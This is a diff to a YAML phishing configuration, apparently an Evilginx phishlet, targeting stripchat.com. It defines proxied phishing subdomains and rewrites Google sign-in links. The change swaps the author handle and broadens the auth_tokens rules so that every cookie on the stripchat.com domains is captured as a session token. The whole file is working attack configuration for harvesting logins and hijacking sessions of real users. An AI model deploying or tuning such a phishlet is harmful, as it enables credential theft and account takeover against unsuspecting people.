--- a/stripchat.yaml
+++ b/stripchat.yaml
@@ -1,4 +1,4 @@
-author: '@cwaizydee'
+author: '@luffy'
 min_ver: '2.3.0'
 proxy_hosts:
   - {phish_sub: 'sv', orig_sub: 'sv', domain: 'stripchat.com', session: true, is_landing: true}
@@ -14,9 +14,9 @@ sub_filters:
   - {triggers_on: 'www.stripchat.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
 auth_tokens:
   - domain: 'sv.stripchat.com'
-    keys: ['token','.*,regexp']
+    keys: ['.*,regexp']
   - domain: '.stripchat.com'
-    keys: ['token','.*,regexp']
+    keys: ['.*,regexp']
 credentials:
   username:
     key: ''
